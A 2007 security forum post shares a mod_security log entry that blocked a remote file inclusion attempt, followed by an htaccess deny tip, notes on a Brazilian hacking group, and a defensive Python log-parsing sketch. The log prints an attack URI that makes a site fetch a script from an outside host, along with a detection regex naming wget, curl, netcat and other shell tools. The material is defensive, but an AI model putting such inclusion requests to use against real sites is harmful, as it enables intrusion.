Do you watch your logs closely?

Discussion in 'Security' started by swapshop, Sep 14, 2007.

Thread Status:
Not open for further replies.
  1. #1
    Does anyone else monitor their web logs closely?

    Please check out this log

    [Fri Sep 14 16:27:13 2007] [error] [client xxx.xxx.xxx.xxx] mod_security: Access denied with code 503. Pattern match "(\\\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|pagina|path|include_location|root|page|gorumDir|site|pun_root|open|seite)=(http|https|ftp)\\\\:/|(cmd|command)=(cd|\\\\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\\\+\\\\+ |\\\\./|whoami|killall |rm \\\\-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.domainname.com"] [uri "/index.php?page=http://andravarldar.se/cmd?"]

    Suggest you may wish to block in your htaccess file

    # Block external script
    deny from 192.128.174.123

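    Anyone translate?

    Eftersom sidan inte är byggd på ett säkert koncept tar jag ner den i förmån för de andra sidorna som ligger på kontot [English translation: "Since the site is not built on a secure concept, I am taking it down in favor of the other sites hosted on the account"]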


    The command runs PHP CHAPLOIT.R. This is a virus!!!!


    http://72.14.253.104/search?q=cache:...n&ct=clnk&cd=1

    From Google

    DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here
    http://www.invasao.com.br/grupo04.htm


    Owner of the robot :

    Country :

    Robot type : unknown

    Description : This robot seems to look for unprotected AWStats installations.

    User Agent transmitted to the visited web server :

    * DataCha0s/2.0

    http://www.invasao.com.br/downloads10.php they even have Google AdSense??
     
    swapshop, Sep 14, 2007
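
A log-triage sketch for entries like the one in the post above, added here as an example and not part of the original thread: it parses mod_security "Access denied" lines from an Apache error log and counts the requests in which a query parameter points at a remote URL. The sample lines are constructed (documentation-range client addresses, shortened pattern text), and the function names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in the error-log layout shown in the post
# (client addresses are documentation-range placeholders, pattern text shortened).
SAMPLE_LOG = r'''
[Fri Sep 14 16:27:13 2007] [error] [client 192.0.2.10] mod_security: Access denied with code 503. Pattern match "(page|dir)=(http|https|ftp)\\:/" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.domainname.com"] [uri "/index.php?page=http://andravarldar.se/cmd?"]
[Fri Sep 14 16:27:15 2007] [error] [client 192.0.2.10] mod_security: Access denied with code 503. Pattern match "(page|dir)=(http|https|ftp)\\:/" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.domainname.com"] [uri "/index.php?page=http://andravarldar.se/cmd?&dir=/tmp"]
[Fri Sep 14 16:30:02 2007] [error] [client 192.0.2.77] File does not exist: /var/www/favicon.ico
'''

DENIED = re.compile(r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] '
                    r'mod_security: Access denied with code (?P<code>\d+)\.')
# The uri field is last on the line; anchor on it because the logged
# pattern text can itself contain quotes and brackets.
URI = re.compile(r'\[uri "(?P<uri>.*)"\]\s*$')
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)

def remote_includes(line):
    """Return (client, param, remote_host) tuples for one denied request, else []."""
    head, tail = DENIED.match(line), URI.search(line)
    if not (head and tail):
        return []
    query = urlsplit(tail['uri']).query
    # A parameter whose value is itself a URL is the remote-inclusion signature.
    return [(head['client'], name, urlsplit(value).hostname)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE.match(value)]

def summarize(log_text):
    """Count remote-inclusion attempts per (client, parameter, remote host)."""
    hits = Counter()
    for line in log_text.splitlines():
        hits.update(remote_includes(line.strip()))
    return hits

if __name__ == "__main__":
    for (client, param, host), n in summarize(SAMPLE_LOG).most_common():
        print(f"{n:3d}  client={client}  param={param}  remote={host}")
```

Grouping by client and remote host shows which source addresses repeat and which hosts the requests try to pull scripts from, which is the information a block rule or abuse report needs.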